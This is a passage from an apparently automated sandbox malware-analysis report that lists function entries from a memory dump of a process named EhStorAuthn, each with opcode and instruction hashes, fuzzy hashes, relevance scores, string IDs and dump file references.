                                                                          • Opcode ID: e6d4001b669c5ae3269d421f33cedbb8c22a1f39d03d69a72f98afb3799690fb
                                                                          • Instruction ID: fa2df782379944123f23bbbf78c4e0cf944124693b129ff32d070e95074603da
                                                                          • Opcode Fuzzy Hash: e6d4001b669c5ae3269d421f33cedbb8c22a1f39d03d69a72f98afb3799690fb
                                                                          • Instruction Fuzzy Hash: 03F0E93001C7885BCB0DAF14D85599AB6E5FFC9349F80175DF889DB241EB75D2448B4A
                                                                          Function 047C7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: __aulldvrm
                                                                          • String ID: +$-
                                                                          • API String ID: 1302938615-2137968064
                                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                          • Instruction ID: d46f515fa490c38764340a0bf61bae48a0933a84eb5b0ada831b9b897d16f393
                                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                          • Instruction Fuzzy Hash: DE916371E0021BDBDB28DE69C8C16BEB7A5AF44721F54451EE855EB3C0EF30A9818F61
                                                                          Function 04789126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $$@
                                                                          • API String ID: 0-1194432280
                                                                          • Opcode ID: 1a64606db16b880fe76b4619a611ff9dd88b859451f9538da0db5cc67a449b44
                                                                          • Instruction ID: 4b2fa210ced34eca4878cec873ba3484df827af8f39b804d2f10f03aafdbfebb
                                                                          • Opcode Fuzzy Hash: 1a64606db16b880fe76b4619a611ff9dd88b859451f9538da0db5cc67a449b44
                                                                          • Instruction Fuzzy Hash: D3812EB1D002699BDB31DF54CD48BEAB7B8AB48714F0046DAEA09B7740E7306E84DF60